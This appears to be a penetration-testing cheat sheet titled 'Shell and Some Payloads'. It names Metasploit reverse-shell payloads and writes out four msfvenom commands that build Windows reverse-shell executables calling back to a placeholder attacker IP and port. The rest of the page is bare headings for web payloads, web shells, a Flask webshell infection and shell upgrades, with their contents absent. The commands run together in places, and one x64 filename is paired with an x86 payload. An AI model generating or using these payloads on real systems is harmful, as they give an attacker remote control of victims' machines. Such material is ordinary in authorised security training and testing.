Shell and Some Payloads
Payload Structure - msfvenom
windows/shell_reverse_tcp (stageless)
windows/shell/reverse_tcp (staged)
linux/shell_reverse_tcp (stageless)
linux/shell/reverse_tcp (staged)Non-Meterpreter Binaries
Windows
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exemsfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exemsfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exemsfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exeLinux
Web Payloads
Java WAR - msfvenom (Non-Meterpreter)
ASP - msfvenom (Non-Meterpreter)
ASPX - msfvenom (Non-Meterpreter)
JSP - msfvenom (Non-Meterpreter)
WAR - msfvenom (Non-Meterpreter)
PHP - msfvenom (Non-Meterpreter) - Reverse Shell
Web Shells
PHP
JSP
ASP
ASPX
Webshell Infecting views.py - Python (Flask)
nodejs
Perl
Spawn tty via Python
Spawn an upgraded shell
tools to make life easier
Last updated
